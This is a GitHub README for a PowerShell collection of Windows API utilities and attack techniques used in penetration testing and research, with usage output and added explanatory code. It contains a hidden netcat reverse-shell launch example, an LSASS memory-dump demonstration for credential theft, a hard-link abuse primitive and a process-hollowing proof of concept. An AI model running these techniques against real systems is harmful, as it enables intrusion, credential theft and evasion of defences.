FuzzySecurity/PowerShell-Suite

GitHub: FuzzySecurity/PowerShell-Suite

A collection of PowerShell scripts implementing low-level Windows operations and attack techniques, in support of security research and penetration testing.

Stars: 2716 | Forks: 760

# PowerShell-Suite

There are great tools and resources online to accomplish most any task in PowerShell; sometimes, however, there is a need to script together a utility for a specific purpose or to bridge an ontological gap. This is a collection of PowerShell utilities I put together either for fun or because I had a narrow application for them. As such, their usefulness may vary, but feel free to post issues or fork and adapt!

## Windows API

Some references for getting at the Windows API from PowerShell:

* FuzzySecurity: [Low-Level Windows API Access From PowerShell](http://www.fuzzysecurity.com/tutorials/24.html)
* Microsoft TechNet: [Use PowerShell to Interact with the Windows API](https://blogs.technet.microsoft.com/heyscriptingguy/2013/06/25/use-powershell-to-interact-with-the-windows-api-part-1/)
* Exploit Monday: [Accessing the Windows API in PowerShell via internal .NET methods and reflection](http://www.exploit-monday.com/2012/05/accessing-native-windows-api-in.html)
* Exploit Monday: [Deep Reflection - Defining Structs and Enums in PowerShell](http://www.exploit-monday.com/2012/07/structs-and-enums-using-reflection.html)

### Invoke-Runas

Functionally equivalent to Windows "runas.exe", using Advapi32::CreateProcessWithLogonW. The -LogonType values are the API's dwLogonFlags: 0x1 is LOGON_WITH_PROFILE, 0x2 is LOGON_NETCREDENTIALS_ONLY (the credentials are only used for outbound network authentication, which is what "/netonly" does). Note that the password is an ordinary command-line parameter, so it ends up in transcripts and script block logs.

```
Start cmd with a local account.
C:\PS> Invoke-Runas -User SomeAccount -Password SomePass -Binary C:\Windows\System32\cmd.exe -LogonType 0x1

Start cmd with remote credentials. Equivalent to "/netonly" in runas.
C:\PS> Invoke-Runas -User SomeAccount -Password SomePass -Domain SomeDomain -Binary C:\Windows\System32\cmd.exe -LogonType 0x2
```

### Invoke-NetSessionEnum

Use Netapi32::NetSessionEnum to enumerate active sessions on domain-joined machines. The call needs no special privilege on a default install, but a host hardened NetCease-style (restricted SrvsvcSessionInfo permissions) answers an unprivileged caller with ERROR_ACCESS_DENIED.

```
Enumerate active sessions on "SomeHostName".
C:\PS> Invoke-NetSessionEnum -HostName SomeHostName
```

### Invoke-CreateProcess

Use Kernel32::CreateProcess to achieve fine-grained control over process creation from PowerShell. The raw values in the examples are the Win32 constants: CreationFlags 0x8000000 is CREATE_NO_WINDOW, ShowWindow 0x0/0x1 are SW_HIDE/SW_SHOWNORMAL, and StartF 0x1 is STARTF_USESHOWWINDOW (without it the ShowWindow value is ignored).

```
Start calc with NONE/SW_SHOWNORMAL/STARTF_USESHOWWINDOW
C:\PS> Invoke-CreateProcess -Binary C:\Windows\System32\calc.exe -CreationFlags 0x0 -ShowWindow 0x1 -StartF 0x1

Start nc reverse shell with CREATE_NO_WINDOW/SW_HIDE/STARTF_USESHOWWINDOW
C:\PS> Invoke-CreateProcess -Binary C:\Some\Path\nc.exe -Args "-nv 127.0.0.1 9988 -e C:\Windows\System32\cmd.exe" -CreationFlags 0x8000000 -ShowWindow 0x0 -StartF 0x1
```

### Detect-Debug

Showcase a number of techniques to detect the presence of a kernel/user-mode debugger from PowerShell.

```
Sample below is x64 Win8, WinDbg attached to PowerShell.
C:\PS> Detect-Debug

[+] Detect Kernel-Mode Debugging
[?] SystemKernelDebuggerInformation: False

[+] Detect User-Mode Debugging
[?] CloseHandle Exception: Detected
[?] IsDebuggerPresent: Detected
[?] CheckRemoteDebuggerPresent: Detected
[?] PEB!BeingDebugged: Detected
[?] PEB!NtGlobalFlag: Detected
[?] DebugSelf: Detected
```
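The following is an added example and not code from PowerShell-Suite: it implements the kernel-side query and four of the user-mode checks listed above with a hand-written P/Invoke block (Add-Type), which is the more readable alternative to the reflection approach from the references. The namespace DbgDemo and the function name Test-Debugger are my own; the struct layout, PEB offsets and information-class numbers are the standard documented values.

```powershell
# Added example (not part of PowerShell-Suite): debugger detection via P/Invoke.
$Source = @"
using System;
using System.Runtime.InteropServices;
namespace DbgDemo {
    [StructLayout(LayoutKind.Sequential)]
    public struct PROCESS_BASIC_INFORMATION {
        public IntPtr ExitStatus;          // NTSTATUS, padded to pointer size
        public IntPtr PebBaseAddress;
        public IntPtr AffinityMask;
        public IntPtr BasePriority;        // KPRIORITY, padded to pointer size
        public IntPtr UniqueProcessId;
        public IntPtr InheritedFromUniqueProcessId;
    }
    public static class Native {
        [DllImport("kernel32.dll")] public static extern bool IsDebuggerPresent();
        [DllImport("kernel32.dll")] public static extern IntPtr GetCurrentProcess();
        [DllImport("kernel32.dll", SetLastError = true)]
        public static extern bool CheckRemoteDebuggerPresent(IntPtr hProcess, ref bool pbDebuggerPresent);
        [DllImport("ntdll.dll")]
        public static extern int NtQueryInformationProcess(IntPtr hProcess, int ProcessInformationClass,
            ref PROCESS_BASIC_INFORMATION ProcessInformation, int ProcessInformationLength, ref int ReturnLength);
        [DllImport("ntdll.dll")]
        public static extern int NtQuerySystemInformation(int SystemInformationClass, IntPtr SystemInformation,
            int SystemInformationLength, ref int ReturnLength);
    }
}
"@
Add-Type -TypeDefinition $Source

function Test-Debugger {
    $M = [System.Runtime.InteropServices.Marshal]
    $results = [ordered]@{}
    $retLen = 0

    # Kernel side: SystemKernelDebuggerInformation (35) fills two BOOLEANs,
    # { KernelDebuggerEnabled, KernelDebuggerNotPresent }. "Enabled" is set by
    # "bcdedit /debug on" even when nothing is connected; "NotPresent" says whether
    # a kernel debugger is actually attached.
    $buf = $M::AllocHGlobal(2)
    try {
        $status = [DbgDemo.Native]::NtQuerySystemInformation(35, $buf, 2, [ref]$retLen)
        if ($status -ne 0) { throw ("NtQuerySystemInformation failed: 0x{0:X8}" -f $status) }
        $results['KernelDebuggerEnabled']  = ($M::ReadByte($buf, 0) -ne 0)
        $results['KernelDebuggerAttached'] = ($M::ReadByte($buf, 1) -eq 0)
    } finally { $M::FreeHGlobal($buf) }

    # User side, the two documented calls first
    $results['IsDebuggerPresent'] = [DbgDemo.Native]::IsDebuggerPresent()
    $remote = $false
    [void][DbgDemo.Native]::CheckRemoteDebuggerPresent([DbgDemo.Native]::GetCurrentProcess(), [ref]$remote)
    $results['CheckRemoteDebuggerPresent'] = $remote

    # Then the PEB directly: ProcessBasicInformation (0) returns our own PEB base
    $pbi = New-Object DbgDemo.PROCESS_BASIC_INFORMATION
    $status = [DbgDemo.Native]::NtQueryInformationProcess([DbgDemo.Native]::GetCurrentProcess(), 0,
        [ref]$pbi, $M::SizeOf($pbi), [ref]$retLen)
    if ($status -ne 0) { throw ("NtQueryInformationProcess failed: 0x{0:X8}" -f $status) }

    # PEB!BeingDebugged is the byte at offset 2 on both x86 and x64 (it is what IsDebuggerPresent reads)
    $results['PEB!BeingDebugged'] = ($M::ReadByte($pbi.PebBaseAddress, 2) -ne 0)

    # PEB!NtGlobalFlag lives at 0x68 (x86) / 0xBC (x64). A process *created* under a debugger gets
    # FLG_HEAP_ENABLE_TAIL_CHECK | FLG_HEAP_ENABLE_FREE_CHECK | FLG_HEAP_VALIDATE_PARAMETERS (0x70);
    # attaching later does not set them, which is why this check complements the others.
    $flagOffset = if ([IntPtr]::Size -eq 8) { 0xBC } else { 0x68 }
    $ntGlobalFlag = $M::ReadInt32($pbi.PebBaseAddress, $flagOffset)
    $results['PEB!NtGlobalFlag'] = (($ntGlobalFlag -band 0x70) -eq 0x70)

    [pscustomobject]$results
}

Test-Debugger
```

Run it twice, once normally and once with PowerShell launched from under WinDbg, and the IsDebuggerPresent/BeingDebugged/NtGlobalFlag columns should flip to True in the second run; attach WinDbg to an already running PowerShell instead and NtGlobalFlag stays False while the other three still fire, which is the difference the comment describes.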
### Get-Handles

Use NtQuerySystemInformation::SystemHandleInformation to get a list of open handles in the specified process, works on x32/x64. Two caveats with this information class: the owning PID is reported as a 16-bit value, and the KernelPointer column is a kernel address leak, which is why since Windows 8.1 a low-integrity caller gets zeroed pointers instead.

```
Get handles for PID 2288
C:\PS> Get-Handles -ProcID 2288

[>] PID 2288 --> notepad
[+] Calling NtQuerySystemInformation::SystemHandleInformation
[?] Success, allocated 449300 byte result buffer
[>] Result buffer contains 28081 SystemHandleInformation objects
[>] PID 2288 has 71 handle objects

 PID ObjectType HandleFlags Handle KernelPointer AccessMask
 --- ---------- ----------- ------ ------------- ----------
2288 Directory  NONE        0x0004 0x88E629F0    0x00000000
2288 File       NONE        0x0008 0x84560C98    0x00100000
2288 File       NONE        0x000C 0x846164F0    0x00100000
2288 Key        NONE        0x0010 0xA3067A80    0x00020000
2288 ALPC Port  NONE        0x0014 0x8480C810    0x001F0000
2288 Mutant     NONE        0x0018 0x8591FEB8    0x001F0000
2288 Key        NONE        0x001C 0x96719C48    0x00020000
2288 Event      NONE        0x0020 0x850C6838    0x001F0000
...Snip...
```

### Get-TokenPrivs

Open a process handle and use Advapi32::GetTokenInformation to list the privileges associated with the process token. The LUID column is the well-known privilege LUID (19 is SE_SHUTDOWN_PRIVILEGE, 23 is SE_CHANGE_NOTIFY_PRIVILEGE, and so on). Note that a privilege being present in the token does not mean it is enabled; that state lives in the Attributes member of each LUID_AND_ATTRIBUTES entry, which this listing does not show.

```
Get token privileges for PID 3836
C:\PS> Get-TokenPrivs -ProcID 3836

[?] PID 3836 --> calc
[+] Process handle: 1428
[+] Token handle: 1028
[+] Token has 5 privileges:

LUID Privilege
---- ---------
  19 SeShutdownPrivilege
  23 SeChangeNotifyPrivilege
  25 SeUndockPrivilege
  33 SeIncreaseWorkingSetPrivilege
  34 SeTimeZonePrivilege
```

### Get-Exports

Get-Exports fetches DLL exports and optionally provides C++ wrapper output (identical to ExportsToC++, but without needing VS and a compiled binary). To do this it reads the DLL bytes into memory and then parses them (no LoadLibraryEx). Because of this you can parse x32/x64 DLLs regardless of the bitness of PowerShell.

```
PS C:\> Get-Exports -DllPath C:\Windows\System32\ubpm.dll

[?] 32-bit Image!
[>] Time Stamp: 07/15/2016 18:07:55
[>] Function Count: 16
[>] Named Functions: 16
[>] Ordinal Base: 1
[>] Function Array RVA: 0x2F578
[>] Name Array RVA: 0x2F5B8
[>] Ordinal Array RVA: 0x2F5F8

Ordinal ImageRVA   FunctionName
------- --------   ------------
      1 0x000242A0 UbpmAcquireJobBackgroundMode
      2 0x00004750 UbpmApiBufferFree
      3 0x00004E30 UbpmCloseTriggerConsumer
      4 0x000135E0 UbpmInitialize
      5 0x00008D00 UbpmOpenTriggerConsumer
      6 0x000242C0 UbpmReleaseJobBackgroundMode
      7 0x00013230 UbpmSessionStateChanged
      8 0x000242E0 UbpmTerminate
      9 0x00003BD0 UbpmTriggerConsumerConfigure
     10 0x000040C0 UbpmTriggerConsumerControl
     11 0x00025B10 UbpmTriggerConsumerControlNotifications
     12 0x00025B40 UbpmTriggerConsumerQueryStatus
     13 0x0000E1B0 UbpmTriggerConsumerRegister
     14 0x000043F0 UbpmTriggerConsumerSetDisabledForUser
     15 0x00012480 UbpmTriggerConsumerSetStatePublishingSecurity
     16 0x00005330 UbpmTriggerConsumerUnregister
```
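As an added example (my own code, not Get-Exports itself), this is the parsing the description refers to: walk the PE headers from a byte array, find the export data directory, map RVAs to file offsets with the section table, and read the three export arrays. Nothing is mapped or loaded, so a 32-bit DLL parses fine from 64-bit PowerShell and the other way round. The function name Get-PeExports and the Forwarder column are my additions; the header offsets are those of the PE specification.

```powershell
# Added example (not part of PowerShell-Suite): parse a DLL's export directory
# straight from the file bytes, without LoadLibrary, so bitness does not matter.
function Get-PeExports {
    param([Parameter(Mandatory = $true)][string]$Path)

    $b    = [System.IO.File]::ReadAllBytes($Path)
    $u16  = { param($o) [BitConverter]::ToUInt16($b, $o) }
    $u32  = { param($o) [BitConverter]::ToUInt32($b, $o) }
    $cstr = { param($o) [System.Text.Encoding]::ASCII.GetString($b, $o, [Array]::IndexOf($b, [byte]0, [int]$o) - $o) }

    if ((& $u16 0) -ne 0x5A4D) { throw "Not an MZ image" }
    $pe = & $u32 0x3C                                   # e_lfanew
    if ((& $u32 $pe) -ne 0x00004550) { throw "Bad PE signature" }

    $fileHdr  = $pe + 4
    $numSects = & $u16 ($fileHdr + 2)
    $optSize  = & $u16 ($fileHdr + 16)
    $optHdr   = $fileHdr + 20
    $magic    = & $u16 $optHdr
    $is64 = switch ($magic) { 0x10B { $false } 0x20B { $true } default { throw "Unknown optional header magic" } }

    # DataDirectory begins 96 (PE32) or 112 (PE32+) bytes into the optional header; entry 0 is the export table
    $ddOff      = $optHdr + $(if ($is64) { 112 } else { 96 })
    $exportRva  = & $u32 $ddOff
    $exportSize = & $u32 ($ddOff + 4)
    if ($exportRva -eq 0) { return }                    # image has no exports

    # The section table follows the optional header; it is what maps an RVA to a file offset
    $sections = @()
    for ($i = 0; $i -lt $numSects; $i++) {
        $s = $optHdr + $optSize + 40 * $i
        $sections += [pscustomobject]@{
            VirtualSize    = & $u32 ($s + 8)
            VirtualAddress = & $u32 ($s + 12)
            SizeOfRawData  = & $u32 ($s + 16)
            RawPointer     = & $u32 ($s + 20)
        }
    }
    $rvaToOff = {
        param($rva)
        foreach ($s in $sections) {
            $span = [Math]::Max($s.VirtualSize, $s.SizeOfRawData)
            if ($rva -ge $s.VirtualAddress -and $rva -lt ($s.VirtualAddress + $span)) {
                return $rva - $s.VirtualAddress + $s.RawPointer
            }
        }
        throw ("RVA 0x{0:X} is not inside any section" -f $rva)
    }

    # IMAGE_EXPORT_DIRECTORY
    $ed           = & $rvaToOff $exportRva
    $ordinalBase  = & $u32 ($ed + 16)
    $numFunctions = & $u32 ($ed + 20)
    $numNames     = & $u32 ($ed + 24)
    $funcArray    = & $rvaToOff (& $u32 ($ed + 28))    # AddressOfFunctions, indexed by (ordinal - base)
    $nameArray    = & $rvaToOff (& $u32 ($ed + 32))    # AddressOfNames
    $ordArray     = & $rvaToOff (& $u32 ($ed + 36))    # AddressOfNameOrdinals, parallel to the names

    # Names attach to functions through the ordinal table; exports without a name stay blank
    $names = @{}
    for ($i = 0; $i -lt $numNames; $i++) {
        $idx = [int](& $u16 ($ordArray + 2 * $i))
        $names[$idx] = & $cstr (& $rvaToOff (& $u32 ($nameArray + 4 * $i)))
    }

    for ($i = 0; $i -lt $numFunctions; $i++) {
        $rva = & $u32 ($funcArray + 4 * $i)
        if ($rva -eq 0) { continue }                    # gap in the ordinal range
        # An RVA that points back into the export directory is a forwarder string ("NTDLL.RtlFoo"), not code
        $fwd = $null
        if ($rva -ge $exportRva -and $rva -lt ($exportRva + $exportSize)) { $fwd = & $cstr (& $rvaToOff $rva) }
        [pscustomobject]@{
            Ordinal      = $ordinalBase + $i
            ImageRVA     = '0x{0:X8}' -f $rva
            FunctionName = $names[$i]
            Forwarder    = $fwd
        }
    }
}

Get-PeExports -Path C:\Windows\System32\ubpm.dll | Format-Table -AutoSize
```

Compared with the Get-Exports listing above, the Ordinal, ImageRVA and FunctionName columns should match row for row on the same ubpm.dll; point it at kernel32.dll to see the Forwarder column populated, since many of its exports forward to ntdll and the API set DLLs.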
### Get-SystemModuleInformation

Use NtQuerySystemInformation::SystemModuleInformation to get a list of loaded modules, their base address and size (x32/x64). The ImageBase column is a KASLR leak and Windows restricts it: since Windows 8.1 a low-integrity caller gets no usable base addresses, and recent builds tighten this further, so check that the values are non-zero before building anything on them.

```
PS C:\> Get-SystemModuleInformation

[+] Calling NtQuerySystemInformation::SystemModuleInformation
[?] Success, allocated 55656 byte result buffer
[?] Result buffer contains 188 SystemModuleInformation objects

ImageBase          ImageSize Image Name
---------          --------- ----------
0xFFFFF80314C0D000 0x749000  \SystemRoot\system32\ntoskrnl.exe
0xFFFFF80315356000 0x6C000   \SystemRoot\system32\hal.dll
0xFFFFF803149ED000 0x9000    \SystemRoot\system32\kd.dll
0xFFFFF88000CB5000 0x5C000   \SystemRoot\System32\drivers\CLFS.SYS
0xFFFFF88000D11000 0x23000   \SystemRoot\System32\drivers\tm.sys
0xFFFFF88000D34000 0x15000   \SystemRoot\system32\PSHED.dll
0xFFFFF88000D49000 0xA000    \SystemRoot\system32\BOOTVID.dll
0xFFFFF88000D53000 0x7F000   \SystemRoot\system32\CI.dll
0xFFFFF88001068000 0x63000   \SystemRoot\System32\drivers\msrpc.sys
0xFFFFF880010CB000 0xC2000   \SystemRoot\system32\drivers\Wdf01000.sys
0xFFFFF8800118D000 0x10000   \SystemRoot\system32\drivers\WDFLDR.SYS
...Snip...
```
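Get-Handles, Get-SystemModuleInformation and Get-SystemProcessInformation all rest on the same primitive, NtQuerySystemInformation with a caller-supplied buffer. As an added example (not PowerShell-Suite code, covering both the Get-Handles and the Get-SystemModuleInformation sections), this shows the part those tools have to get right: the kernel answers STATUS_INFO_LENGTH_MISMATCH until the buffer is large enough, and because the handle table grows between two calls you loop on that status rather than trusting ReturnLength. The struct is the standard SYSTEM_HANDLE_TABLE_ENTRY_INFO; the namespace HandleDemo and the function name Get-SystemHandleTable are mine.

```powershell
# Added example (not part of PowerShell-Suite): dump the system handle table with
# NtQuerySystemInformation(SystemHandleInformation), growing the buffer until accepted.
$Source = @"
using System;
using System.Runtime.InteropServices;
namespace HandleDemo {
    [StructLayout(LayoutKind.Sequential)]
    public struct SYSTEM_HANDLE_TABLE_ENTRY_INFO {
        public ushort UniqueProcessId;       // 16-bit: PIDs above 65535 are truncated by this class
        public ushort CreatorBackTraceIndex;
        public byte   ObjectTypeIndex;
        public byte   HandleAttributes;
        public ushort HandleValue;
        public IntPtr Object;                // kernel address of the object
        public uint   GrantedAccess;
    }
    public static class Native {
        [DllImport("ntdll.dll")]
        public static extern int NtQuerySystemInformation(int SystemInformationClass, IntPtr SystemInformation,
            int SystemInformationLength, ref int ReturnLength);
    }
}
"@
Add-Type -TypeDefinition $Source

function Get-SystemHandleTable {
    param([int]$ProcessId = 0)   # 0 = every process
    $M = [System.Runtime.InteropServices.Marshal]
    $SystemHandleInformation     = 16
    $STATUS_INFO_LENGTH_MISMATCH = -1073741820   # 0xC0000004 as the signed NTSTATUS the import returns

    # For this class ReturnLength is not a reliable "bytes needed" hint and the table
    # changes between calls, so double the buffer until the call succeeds.
    $size = 0x10000
    $buf  = [IntPtr]::Zero
    try {
        while ($true) {
            $buf = $M::AllocHGlobal($size)
            $retLen = 0
            $status = [HandleDemo.Native]::NtQuerySystemInformation($SystemHandleInformation, $buf, $size, [ref]$retLen)
            if ($status -eq $STATUS_INFO_LENGTH_MISMATCH) {
                $M::FreeHGlobal($buf); $buf = [IntPtr]::Zero
                $size *= 2
                continue
            }
            if ($status -ne 0) { throw ("NtQuerySystemInformation failed: 0x{0:X8}" -f $status) }
            break
        }

        # Layout: ULONG NumberOfHandles, padding up to pointer alignment, then the entry array
        $count     = $M::ReadInt32($buf)
        $entryType = [type]'HandleDemo.SYSTEM_HANDLE_TABLE_ENTRY_INFO'
        $entrySize = $M::SizeOf($entryType)      # 16 bytes on x86, 24 on x64
        $base      = $buf.ToInt64() + [IntPtr]::Size

        for ($i = 0; $i -lt $count; $i++) {
            $e = $M::PtrToStructure([IntPtr]($base + $i * $entrySize), $entryType)
            if ($ProcessId -and $e.UniqueProcessId -ne $ProcessId) { continue }
            [pscustomobject]@{
                PID             = $e.UniqueProcessId
                ObjectTypeIndex = $e.ObjectTypeIndex   # NtQueryObject(ObjectTypeInformation) turns this into "File", "Key", ...
                HandleFlags     = $e.HandleAttributes
                Handle          = '0x{0:X4}' -f $e.HandleValue
                KernelPointer   = '0x{0:X}' -f $e.Object.ToInt64()
                AccessMask      = '0x{0:X8}' -f $e.GrantedAccess
            }
        }
    } finally {
        if ($buf -ne [IntPtr]::Zero) { $M::FreeHGlobal($buf) }
    }
}

# Handles of the current PowerShell process, the equivalent of "Get-Handles -ProcID $PID"
Get-SystemHandleTable -ProcessId $PID | Format-Table -AutoSize
```

Run without -ProcessId to get the whole table, which is tens of thousands of rows on a busy host; if every KernelPointer comes back as 0x0 the caller is below the integrity level Windows allows for pointer disclosure, and SystemExtendedHandleInformation (class 64) is the variant to use when 16-bit PIDs are not enough.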
### Expose-NetAPI

A crude utility to expose .NET API classes to PowerShell through reflection. This includes internal private classes like Microsoft.Win32.UnsafeNativeMethods.

```
# Not all namespaces are available by default in
# PowerShell, MSDN/Google is your friend!
C:\PS> Expose-NetAPI -Search bitmap
[!] Search returned no results, try specifying the namespace!

C:\PS> Expose-NetAPI -Search bitmap -Namespace System.Drawing

Assembly           TypeName                         Name                       Definition
--------           --------                         ----                       ----------
System.Drawing.dll System.Windows.Forms.DpiHelper   CreateResizedBitmap        static System.Drawing.Bitmap Crea...
System.Drawing.dll System.Windows.Forms.DpiHelper   ScaleBitmapLogicalToDevice static void ScaleBitmapLogicalToD...
System.Drawing.dll System.Drawing.Bitmap            FromHbitmap                static System.Drawing.Bitmap From...
System.Drawing.dll System.Drawing.BitmapSelector    CreateBitmap               static System.Drawing.Bitmap Crea...
System.Drawing.dll System.Drawing.Image             FromHbitmap                static System.Drawing.Bitmap From...
System.Drawing.dll System.Drawing.SafeNativeMethods CreateBitmap               static System.IntPtr CreateBitmap...
System.Drawing.dll System.Drawing.SafeNativeMethods CreateCompatibleBitmap     static System.IntPtr CreateCompat...
System.Drawing.dll System.Drawing.SafeNativeMethods IntCreateBitmap            static System.IntPtr IntCreateBit...
System.Drawing.dll System.Drawing.SafeNativeMethods IntCreateCompatibleBitmap  static System.IntPtr IntCreateCom...
System.Drawing.dll System.Drawing.Imaging.Metafile  FromHbitmap                static System.Drawing.Bitmap From...

# Often multiple options available with differing
# definitions. Take care when selecting the desired
# API.
C:\PS> Expose-NetAPI -Search drawbutton |Select Assembly,TypeName,Name |ft

Assembly                 TypeName                                          Name
--------                 --------                                          ----
System.Windows.Forms.dll System.Windows.Forms.ButtonRenderer               DrawButton
System.Windows.Forms.dll System.Windows.Forms.ControlPaint                 DrawButton
System.Windows.Forms.dll System.Windows.Forms.DataGridViewButtonCell+Da... DrawButton

# Take care when directly calling enable, a number
# of assemblies are not loaded by default!
C:\PS> Expose-NetAPI -Enable -Assembly System.Windows.Forms.dll -TypeName System.Windows.Forms.SafeNativeMethods
[!] Unable to locate specified assembly!

C:\PS> Expose-NetAPI -Load System.Windows.Forms
True

C:\PS> Expose-NetAPI -Enable -Assembly System.Windows.Forms.dll -TypeName System.Windows.Forms.SafeNativeMethods
[+] Created $SystemWindowsFormsSafeNativeMethods!

# Once enabled the TypeName is exposed as a global
# variable and can be used to call any API's it includes!
C:\PS> Expose-NetAPI -Enable -Assembly System.dll -TypeName Microsoft.Win32.UnsafeNativeMethods |Out-Null
C:\PS> Expose-NetAPI -Enable -Assembly System.dll -TypeName Microsoft.Win32.SafeNativeMethods |Out-Null
C:\PS> $ModHandle = $MicrosoftWin32UnsafeNativeMethods::GetModuleHandle("kernel32.dll")
C:\PS> $Kernel32Ref = New-Object System.Runtime.InteropServices.HandleRef([IntPtr]::Zero,$ModHandle)
C:\PS> $Beep = $MicrosoftWin32UnsafeNativeMethods::GetProcAddress($Kernel32Ref, "Beep")
C:\PS> $MicrosoftWin32SafeNativeMethods::MessageBox([IntPtr]::Zero,$("{0:X}" -f [int64]$Beep),"Beep",0)
```

### Get-ProcessMiniDump

Create a process dump using Dbghelp::MiniDumpWriteDump. Dumping LSASS this way is the classic credential-theft path (MITRE ATT&CK T1003.001): opening lsass.exe with PROCESS_VM_READ is exactly what Sysmon Event ID 10 (ProcessAccess) and most EDR products alert on, and giving the dump a .ini extension does not change that.

```
# Elevated user dumping elevated process
C:\PS> (Get-Process lsass).Id
528
C:\PS> $CallResult = Get-ProcessMiniDump -ProcID 528 -Path C:\Users\asenath.waite\Desktop\tmp.ini -Verbose
VERBOSE: [?] Running as: Administrator
VERBOSE: [?] Administrator privileges required
VERBOSE: [>] Administrator privileges held
VERBOSE: [>] Process dump success!
C:\PS> $CallResult
True

# low priv user dumping low priv process
C:\PS> (Get-Process calc).Id
2424
C:\PS> $CallResult = Get-ProcessMiniDump -ProcID 2424 -Path C:\Users\asenath.waite\Desktop\tmp.ini -Verbose
VERBOSE: [?] Running as: asenath.waite
VERBOSE: [>] Process dump success!
C:\PS> $CallResult
True

# low priv user dumping elevated process
C:\PS> $CallResult = Get-ProcessMiniDump -ProcID 4 -Path C:\Users\asenath.waite\Desktop\tmp.ini -Verbose
VERBOSE: [?] Running as: asenath.waite
VERBOSE: [?] Administrator privileges required
VERBOSE: [!] Administrator privileges not held!
C:\PS> $CallResult
False
```

### Get-SystemProcessInformation

Use NtQuerySystemInformation::SystemProcessInformation to get a detailed process listing and process attributes. On closer inspection you will find that many process monitors (like Sysinternals Process Explorer or Process Hacker) use this information class (together with SystemPerformanceInformation, SystemProcessorPerformanceInformation and SystemProcessorCycleTimeInformation).

```
# Return full process listing
C:\PS> Get-SystemProcessInformation

# Return only specific PID
C:\PS> Get-SystemProcessInformation -ProcID 1336

PID                        : 1336
InheritedFromPID           : 1020
ImageName                  : svchost.exe
Priority                   : 8
CreateTime                 : 0d:9h:8m:47s
UserCPU                    : 0d:0h:0m:0s
KernelCPU                  : 0d:0h:0m:0s
ThreadCount                : 12
HandleCount                : 387
PageFaults                 : 7655
SessionId                  : 0
PageDirectoryBase          : 3821568
PeakVirtualSize            : 2097249.796875 MB
VirtualSize                : 2097240.796875 MB
PeakWorkingSetSize         : 11.65625 MB
WorkingSetSize             : 6.2109375 MB
QuotaPeakPagedPoolUsage    : 0.175910949707031 MB
QuotaPagedPoolUsage        : 0.167121887207031 MB
QuotaPeakNonPagedPoolUsage : 0.0151519775390625 MB
QuotaNonPagedPoolUsage     : 0.0137710571289063 MB
PagefileUsage              : 3.64453125 MB
PeakPagefileUsage          : 4.14453125 MB
PrivatePageCount           : 3.64453125 MB
ReadOperationCount         : 0
WriteOperationCount        : 0
OtherOperationCount        : 223
ReadTransferCount          : 0
WriteTransferCount         : 0
OtherTransferCount         : 25010

# Possibly returns multiple processes
# eg: notepad.exe & notepad++.exe
C:\PS> Get-SystemProcessInformation -ProcName note
```

### Get-OSTokenInformation

Get-OSTokenInformation uses a variety of APIs to get all (accessible) user tokens and query their details.

```
# Return full token listing
C:\PS> $OsTokens = Get-OSTokenInformation
C:\PS> $OsTokens.Count
136
C:\PS> $OsTokens[10]

PassMustChange      : N/A
ProcessCompany      : Microsoft Corporation
AuthPackage         : NTLM
TokenType           : TokenPrimary
PID                 : 5876
LastSuccessfulLogon : N/A
Session             : 1
LastFailedLogon     : N/A
ProcessPath         : C:\Windows\system32\backgroundTaskHost.exe
LogonServer         : MSEDGEWIN10
Sid                 : S-1-5-21-4233833229-2203495600-2027003190-1000
ProcessAuthenticode : Valid
User                : MSEDGEWIN10\IEUser
LoginTime           : 4/16/2018 9:52:20 PM
TokenPrivilegeCount : 5
TokenPrivileges     : {SeShutdownPrivilege, SeChangeNotifyPrivilege, SeUndockPrivilege, SeIncreaseWorkingSetPrivilege...}
Process             : backgroundTaskHost
PassLastSet         : 10/17/2017 6:13:19 PM
ImpersonationType   : N/A
TID                 : Primary
TokenGroups         : {MSEDGEWIN10\IEUser, MSEDGEWIN10\None, Everyone, NT AUTHORITY\Local account and member of Administrators group...}
LogonType           : Interactive
GroupCount          : 14
Elevated            : No

# Return brief token listing
C:\PS> Get-OSTokenInformation -Brief

Process              PID  TID     Elevated ImpersonationType     User
-------              ---  ---     -------- -----------------     ----
ApplicationFrameHost 5820 Primary No       N/A                   MSEDGEWIN10\IEUser
backgroundTaskHost   1076 Primary No       N/A                   MSEDGEWIN10\IEUser
backgroundTaskHost   1960 Primary No       N/A                   MSEDGEWIN10\IEUser
backgroundTaskHost   7860 Primary No       N/A                   MSEDGEWIN10\IEUser
CompatTelRunner      680  Primary Yes      N/A                   NT AUTHORITY\SYSTEM
CompatTelRunner      6916 Primary Yes      N/A                   NT AUTHORITY\SYSTEM
CompatTelRunner      8488 Primary Yes      N/A                   NT AUTHORITY\SYSTEM
svchost              3572 Primary Yes      N/A                   NT AUTHORITY\SYSTEM
svchost              3900 Primary Yes      N/A                   NT AUTHORITY\SYSTEM
svchost              4292 Primary Yes      N/A                   NT AUTHORITY\SYSTEM
svchost              4292 144     No       SecurityImpersonation MSEDGEWIN10\IEUser
svchost              4292 7704    No       SecurityImpersonation MSEDGEWIN10\IEUser
svchost              4292 1404    No       SecurityImpersonation MSEDGEWIN10\IEUser
svchost              4464 Primary No       N/A                   MSEDGEWIN10\IEUser
svchost              4556 Primary No       N/A                   MSEDGEWIN10\IEUser
[... Snip ...]
```

### Native-HardLink

This is a proof-of-concept for NT hard links. From an attack perspective there are advantages to creating hard links with NtSetInformationFile (as opposed to mklink/CreateHardLink): NtSetInformationFile allows us to link to files we do not have write access to. A hard link is the same file with the same DACL, so the gain is not access to the target's contents but getting a privileged component to write to, or delete, the link path. Later Windows 10 releases require write access to the target when creating hard links, so test the primitive on the exact build in scope rather than assuming it still works.

```
PS C:\> Native-HardLink -Link C:\Some\Path\Hard.Link -Target C:\Some\Path\Target.file
True
```

## Attack Techniques

### Start-Hollow

This is a proof-of-concept for process hollowing. Nothing new here, except perhaps the use of NtCreateProcessEx, which has some advantages: it provides a convenient way to set the parent process and avoids the pesky Get/SetThreadContext. CreateRemoteThreadEx/NtCreateThreadEx, on the other hand, are highly suspicious APIs.

```
# Create a Hollow from a PE on disk with explorer as the parent.
# x64 Win10 RS4
C:\PS> Start-Hollow -Sponsor C:\Windows\System32\notepad.exe -Hollow C:\Some\PE.exe -ParentPID 8304 -Verbose
VERBOSE: [?] A place where souls may mend your ailing mind..
VERBOSE: [+] Opened file for access
VERBOSE: [+] Created section from file handle
VERBOSE: [+] Opened handle to the parent => explorer
VERBOSE: [+] Created process from section
VERBOSE: [+] Acquired PBI
VERBOSE: [+] Sponsor architecture is x64
VERBOSE: [+] Sponsor ImageBaseAddress => 7FF69E9F0000
VERBOSE: [+] Allocated space for the Hollow process
VERBOSE: [+] Duplicated Hollow PE headers to the Sponsor
